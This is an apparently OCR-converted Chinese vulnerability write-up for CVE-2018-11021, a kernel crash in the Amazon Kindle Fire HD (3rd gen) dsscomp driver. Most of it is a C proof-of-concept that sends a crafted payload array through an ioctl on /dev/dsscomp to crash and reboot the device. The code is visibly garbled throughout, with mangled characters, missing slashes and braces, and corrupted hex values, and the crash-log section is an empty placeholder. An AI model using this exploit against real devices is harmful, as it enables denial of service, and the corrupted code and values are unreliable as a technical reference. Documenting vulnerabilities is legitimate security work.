(CVE-2018-11021)Amazon Kindle Fire HD (3rd) Fire OS kernel组件安全漏洞.docx
(CVE-2018-11021) Amazon Kindle Fire HD (3rd) Fire OS kernel 组件安全漏洞 一、漏洞简介 Amazon Kindle Fire HD (3rd) Fire OS 4.5.5.3 内核组件中的内核模块 omap/drivers/video/omap2/dsscomp/device.c 允许攻击者通过对设备文件 /dev/dsscomp 发起 ioctl 调用、以命令 1118064517 注入特制参数，导致内核崩溃（本地拒绝服务；下文 PoC 的注释指出运行者需具备对 /dev/dsscomp 执行 ioctl 的权限）。要触发此漏洞，必须打开设备文件 /dev/dsscomp，并使用命令 1118064517 和精心构造的有效负载作为第三个参数在此设备文件上调用 ioctl 系统调用。二、漏洞影响 Fire OS 4.5.5.3 三、复现过程 poc /* This is poc of Kindle Fire HD 3rd* A bug in the ioctl interface of device file devdsscomp causes the system crash via IOCTL 1118064517.* Related buggy struct name is dsscomp_setup_dispc_data.* This Poc should run with permission to do ioctl on devdsscomp.*/#include <stdio.h>#include <fcntl.h> ttinclude <errno.h> #include <sysioctl.h>const static char *driver = ,devdsscomp"static command = 1118064517;int main(int argc, char *argv, char *env) unsigned int payload = 0xffffffff, 0X00000003j 0×5d200040, 0×79900008j 0x8f5928bd, 0x78b02422j 0X000000004 Oxffffffff, 0×f4c50400,0x007fffff, 0x8499f562, 0×ffff0400, 0×001bl31dj 0×60818210, 0x00000007, 0×ffffffff, 0x00000000, 0x9da9041c 0xcd980400, 0x001f03f4, 0X00000007, 0x2a34003f, 0x7c80d8f3j 0x63102627, 0×c73643a8, 0xa28f0665, 0X00000000, 0x689e57b4, 0x01ff0008, 0x5e7324bl, 0×ae3b003f, 0×0bl74d86, 0x00000400, 0x2:Iffff37, 0×ceb367a4j 0X00000040, 0X00000001, 0xec000f9e, 0x00000001j 0×000001ff, 0X00000000, 0×00000000, 0X0000000f, 0x0425c069, 0×038cc3bej 0×0000000f, 0×00000080, 0×e5790100, 0x5blbffffj 0x0000d355, 0x0000c685, 0xa0070000, 0×0010ffff, 0×00a0ff00, 0X00000001j 0ff490700, 0×0832ad03j 0×00000006, 0×00000002, 0X00000001 0×81f871c0, 0×738019cb, 0×bf47ffff, 0X00000040j 0X00000001, 0x7fl90f33, 0X00000001, 0x8295769b, 0x0000003fj 0x869f2295, Oxffffffff, 0xd673914f, 0x05055800, 0xed69b7d5, 0×00000000j 0×0107ebbdj 0xd214af8d, 0xffff4a93j 0x26450008, 0x58df0000, 0×dl6db084, 0×03ff30ddj 0x00000001, 0x209aff3b, 0xe7850800, 0X00000002, 0x30da815cj 0x426f5105, 0x0del09d7, 0×2cla65fcj 0xfcb3d75f, 0X00000000, 0×00000001, 0×8066be5b, 0X00000002, 0ffffffff, 0x5cf232ec, 0×680dl469j 0X00000001j 
0X00000020, 0xffffffff, 0X00000400, 0xdldl2be8j 0X02010200, 0x01ffcl6f, 0xf6e237e6j 0x007f0000j 0x0Iff08f8, 0×000f00f9, 0×bad07695, 0x00000000, 0xbaff0000, 0x24040040j 0x00000006j 0X00000004, 0x00000000, 0×bc2e9242j 0×009f5f08, 0X00800000, 0X00000000, 0x00000001, 0xff8800ff, 0X00000001, 0×00000000j 0X000003f4, 0x6faa8472j 0x00000400, 0xec857dd5, 0x00000000j 0X00000040, 0×ffffffff, 0×3f004874, 0x0000b77a, 0×ec9acb95j 0×facc0001j 0xffff0001j 0×0080ffffj 0x3600ff03, 0X00000001, 0×8fff7d7f, 0×6b87075a, 0x00000000, 0x41414141j 0×41414141j 0x41414141j 0x41414141, 0X00100Iff, 0×00000000j 0X00000001, 0xfflf0512j 0x00000001, 0x51e32167, 0xcl8c55ccj 0x00000000, Oxffffffff, 0xb4aafl2b ×86edfdbdj 0x00000010, 0x0000003f,0xabff7b00j0xffff9ea3j0×b28e0040,0×000fffff,0x458603f4,0×ffff007f,0×a9030f02j0×00000001j0x002Cffff,0x9e00cdffj0x00000004j0x41414141,0x41414141,0×41414141,0x41414141 ;int fd = 0;fd = OPen(driver, 0_RDWR);if (fd < 0) printf("Failed to open %sj with errno %dn, driver, errno);system("echo 1 > datalocaltmplog");return -1;printf("Try open %s with command 0x%×.n", driver, command);printf("System will crash and reboot.n");if(ioctl(fd, command, payload) < 0) printf("Allocation of structs failed, %dn, errno);system("echo 2 > datalocaltmplog");return -1;close(fd);return 0;)崩溃日志To be added here